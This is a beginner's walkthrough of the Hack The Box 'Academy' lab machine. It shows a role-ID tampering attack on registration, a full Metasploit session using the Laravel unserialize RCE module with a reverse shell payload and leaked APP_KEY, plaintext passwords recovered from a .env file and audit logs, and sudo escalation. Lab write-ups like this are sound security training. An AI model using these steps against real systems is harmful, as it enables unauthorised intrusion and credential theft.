HTB: Academy Box
Room Academy on Hack The Box
Let’s do nmap scan : nmap -p- -T4 -A -v 10.10.10.215
When we tried opening 10.10.10.215:80 it showed 302 response and redirecting us to academy.htb which doesn’t open up.
We added 10.10.10.215 academy.htb to etc/hosts so that it become known host. And we are greeted with a login page this time on reloading 10.10.10.215:80.
Lets register first n00bx101:123456
On login we are treated with a page
Rabbit hole :’) Let’s head back to register we see a hidden field roleid so let’s make it 1 and make creds tera:12345
So let’s now login at academy.htb/admin.php with creds we made
So the last task is pending let’s add it to /etc/hosts file
So on opening dev-staging-01.academy.htb we are greeted with
So after so much forking we get to see that the app is made with laravel
So we searched for the exploit and we landed on RCE
msf6 > search laravel
Matching Modules
================# Name Disclosure Date Rank Check Description
— — — — — — — — — — — — — — — — — — — — — -
0 exploit/unix/http/laravel_token_unserialize_exec 2018–08–07 excellent Yes PHP Laravel Framework token Unserialize Remote Command ExecutionInteract with a module by name or index. For example info 0, use 0 or use exploit/unix/http/laravel_token_unserialize_exec
msf6 > use 0
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(unix/http/laravel_token_unserialize_exec) > show optionsModule options (exploit/unix/http/laravel_token_unserialize_exec):
Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — — -
APP_KEY no The base64 encoded APP_KEY string from the .env file
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to target webapp
VHOST no HTTP server virtual hostPayload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — — -
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen portExploit target:
Id Name
— — —
0 Automaticmsf6 exploit(unix/http/laravel_token_unserialize_exec) > set LHOST 10.10.15.5
LHOST => 10.10.15.5
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set VHOST dev-staging-01.academy.htb
VHOST => dev-staging-01.academy.htb
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set RHOST 10.10.10.215
RHOST => 10.10.10.215
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_KEY => dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
and we landed in the machine
On navigation we can see the users at :
And we logged in as
After some manual enumeration I found a .env file
On reading it we found he password
With try and error we found cry0l1t3:mySup3rP4s5w0rd!!
And now we can read the user.txt under the directory of cry0l1t3 to get user flag.
In /var/log/audit
On decryption the hex the password was mrb3n_Ac@d3my!.
Use mrb3n:mrb3n_Ac@d3my!
We can run sudo with mrb3n
GTFO BIN at our rescue: Link
This is my first box pawned completely on HTB and I want to thank HTB discord community for helping me out when I needed the most. I will try harder and pawn more boxes in the coming future :) . Feel free to suggest changes if I have done any mistakes.
“Thanks for reading!!”